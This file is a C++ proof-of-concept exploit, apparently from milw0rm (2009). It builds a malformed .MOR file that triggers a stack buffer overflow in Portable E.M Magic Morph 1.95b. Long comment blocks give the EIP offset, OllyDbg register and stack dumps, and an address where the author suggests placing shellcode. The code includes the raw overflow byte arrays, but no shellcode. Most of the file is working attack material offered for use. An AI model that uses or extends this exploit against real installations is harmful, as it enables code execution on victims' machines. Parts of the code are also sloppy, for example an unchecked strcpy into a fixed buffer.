350 lines
No EOL
19 KiB
C++
350 lines
No EOL
19 KiB
C++
/*********************************************************************
|
|
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC *
|
|
By fl0 fl0w *
|
|
"can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" *
|
|
**********************************************************************
|
|
|
|
|
|
/********************************************************************************************************
|
|
The EIP offset is at 312 bytes 0x138 HEX *
|
|
After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start *
|
|
of the file, and you'll have to rezult with 0x138 bytes *
|
|
*
|
|
I used a technique names "stack spray" to determine the offset. *
|
|
*
|
|
CPU REGISTERS *
|
|
EAX 00000000 *
|
|
ECX 33333333 *
|
|
EDX 01492288 *
|
|
EBX 00000001 *
|
|
*
|
|
ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *
|
|
````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
|
|
XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *
|
|
EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
|
|
YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *
|
|
bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa *
|
|
*
|
|
ESI 00F369B0 *
|
|
EDI 00F369B0 *
|
|
EIP 41414141 *
|
|
*
|
|
We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. *
|
|
So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
|
|
starts at a much lower address. *
|
|
This is what ESP points to: *
|
|
********************************************************************************************************
|
|
*/
|
|
|
|
/************************
|
|
STACK *
|
|
0012EF7C 62343434 *
|
|
0012EF80 62626262 *
|
|
0012EF84 62626262 *
|
|
0012EF88 67676262 *
|
|
0012EF8C 67676767 *
|
|
0012EF90 67676767 *
|
|
0012EF94 67676767 *
|
|
0012EF98 62676767 *
|
|
0012EF9C 61616161 *
|
|
0012EFA0 61616161 *
|
|
0012EFA4 61616161 *
|
|
0012EFA8 61616161 *
|
|
0012EFAC 61616161 *
|
|
0012EFB0 61616161 *
|
|
0012EFB4 61616161 *
|
|
0012EFB8 61616161 *
|
|
0012EFBC 61616161 *
|
|
0012EFC0 61616161 *
|
|
0012EFC4 61616161 *
|
|
0012EFC8 61616161 *
|
|
0012EFCC 60606060 *
|
|
0012EFD0 60606060 *
|
|
0012EFD4 60606060 *
|
|
0012EFD8 60606060 *
|
|
0012EFDC 60606060 *
|
|
0012EFE0 60606060 *
|
|
0012EFE4 60606060 *
|
|
0012EFE8 60606060 *
|
|
0012EFF0 60606060 *
|
|
0012EFF4 60606060 *
|
|
0012EFF8 60606060 *
|
|
0012EFFC 59595959 *
|
|
0012F000 59595959 *
|
|
0012F004 59595959 *
|
|
0012F008 59595959 *
|
|
0012F00C 59595959 *
|
|
..................... *
|
|
***********************
|
|
*/
|
|
|
|
|
|
/*************************************************
|
|
You can copy your shellcode starting from here : *
|
|
0012EC3C 63636363 *
|
|
*
|
|
0x12EF80 = 1240960 ->NOT-> A *
|
|
*
|
|
0x12EC3C = 1240124 ->NOT-> B *
|
|
*
|
|
A > B *
|
|
A - B = 836 = 0x344 *
|
|
So the stack gets corrupted a long way from ESP.*
|
|
*************************************************
|
|
*/
|
|
|
|
|
|
|
|
/*************************************************
|
|
LOOK OF THE DUMP *
|
|
0012EE4C 63 63 63 63 cccc *
|
|
0012EE54 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EE5C 32 32 32 32 32 32 32 32 22222222 *
|
|
0012EE64 32 33 33 33 33 33 33 33 23333333 *
|
|
0012EE6C 33 33 33 66 66 66 66 66 333fffff *
|
|
0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *
|
|
0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *
|
|
0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *
|
|
0012EE8C 67 67 67 67 67 67 67 67 gggggggg *
|
|
0012EE94 67 67 67 67 67 67 67 62 gggggggb *
|
|
0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EECC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EED4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEDC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEE4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEEC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEF4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *
|
|
0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *
|
|
0012EF3C 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF44 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF4C 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF54 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF5C 32 32 32 32 32 32 32 32 22222222 *
|
|
0012EF64 32 33 33 33 33 33 33 33 23333333 *
|
|
0012EF6C 33 33 33 66 66 66 66 66 333fffff *
|
|
0012EF74 41 41 41 41 77 77 34 34 AAAAww44 *
|
|
0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *
|
|
0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *
|
|
0012EF8C 67 67 67 67 67 67 67 67 gggggggg *
|
|
0012EF94 67 67 67 67 67 67 67 62 gggggggb *
|
|
0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFCC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFD4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFDC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFE4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFEC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFF4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
*************************************************
|
|
*/
|
|
|
|
/**************************************************************************************
|
|
Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *
|
|
Special greetz to OSHO,!_30,str0ke,Carcabot. *
|
|
Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
|
|
http://www.sploitz.10001mb.com *
|
|
*************************************************************************************
|
|
*/
|
|
|
|
/*************************************************************************
|
|
DEMO *
|
|
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe *
|
|
********************************************************************* *
|
|
Magic Morph .MOR File Stack Buffer Overflow POC *
|
|
The usage is: *
|
|
All Credits fl0 fl0w *
|
|
*
|
|
-f FILE.mor *
|
|
**************************************************************************
|
|
*
|
|
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *
|
|
File DONE ! *
|
|
**************************************************************************
|
|
*/
|
|
|
|
/*****************************************************************************************
|
|
Technicall details *
|
|
This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 *
|
|
You can download the POC allong with debugging details from my website *
|
|
|
|
Preview ... *
|
|
...... *
|
|
This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)*
|
|
and the software Portable E.M Magic Morph 1.95b. *
|
|
ALL CREDITS GO TO fl0 fl0w for this exploit ! *
|
|
http://www.sploitz.10001mb.com/ *
|
|
........................... *
|
|
******************************************************************************************
|
|
*/
|
|
//START Algorithm
|
|
#include "stdio.h"
|
|
#include "string.h"
|
|
#include "stdlib.h"
|
|
#include "windows.h"
|
|
#include "stdint.h"
|
|
#include "getopt.h"
|
|
typedef struct flo {
|
|
uint8_t a;
|
|
uint8_t b;
|
|
uint8_t c;
|
|
}F;
|
|
|
|
|
|
|
|
void buildFile(char *fname)
|
|
{
|
|
uint8_t hexfileP1[] =
|
|
{
|
|
0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
|
|
0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
|
|
0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
|
|
0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
|
|
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
|
|
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
|
|
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
|
|
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
|
|
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
|
|
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
|
|
0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
|
|
0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
|
|
0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
|
|
};
|
|
|
|
uint8_t hexfileP2[] = {
|
|
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
|
|
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
|
|
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
|
|
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
|
|
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
|
|
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
|
|
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
|
|
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
|
|
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
|
|
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
|
|
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
|
|
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
|
|
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
};
|
|
|
|
uint8_t hexfileP3[] = {
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
|
|
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
|
|
0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
|
|
0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
|
|
0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
|
|
0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
} ;
|
|
FILE *f;
|
|
f = fopen(fname ,"wb");
|
|
F *Gf;
|
|
Gf = (F*)malloc(sizeof(F));
|
|
Gf->a = 0x43;
|
|
Gf->b = 0x3A;
|
|
Gf->c = 0x5C;
|
|
uint8_t B[100];
|
|
memcpy(B, Gf, sizeof(Gf));
|
|
fwrite(B, sizeof(uint8_t), 3, f);
|
|
fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);
|
|
fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);
|
|
fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);
|
|
fclose(f);
|
|
}
|
|
void args(int argc, char *argv[])
|
|
{
|
|
int file;
|
|
int a;
|
|
if(a)
|
|
while((a = getopt(argc, argv, "f")) != EOF) {
|
|
switch(a) {
|
|
case 'f':
|
|
file = (int)optarg;
|
|
break;
|
|
default:
|
|
exit(-1);
|
|
}
|
|
}
|
|
}
|
|
void Usage (char *Name)
|
|
{ system("CLS");
|
|
printf("*********************************************************************\n");
|
|
fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n");
|
|
printf("The usage is:\n");
|
|
|
|
fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
|
|
}
|
|
void Menu()
|
|
{ fprintf(stderr,
|
|
"\n"
|
|
"\t-f FILE.mor\n"
|
|
"*********************************************************************"
|
|
"\n");
|
|
}
|
|
|
|
int main(int32_t argc , char *argv[])
|
|
{ if(argc < 2) {
|
|
Usage(argv[0]);
|
|
Menu();
|
|
|
|
exit(-1);
|
|
}
|
|
char b[100];
|
|
strcpy(b, argv[2]);
|
|
strcat(b, ".mor");
|
|
buildFile(b);
|
|
printf("File DONE !\n");
|
|
return 0;
|
|
}
|
|
//END Algorithm
|
|
|
|
/ milw0rm.com [2009-09-14] |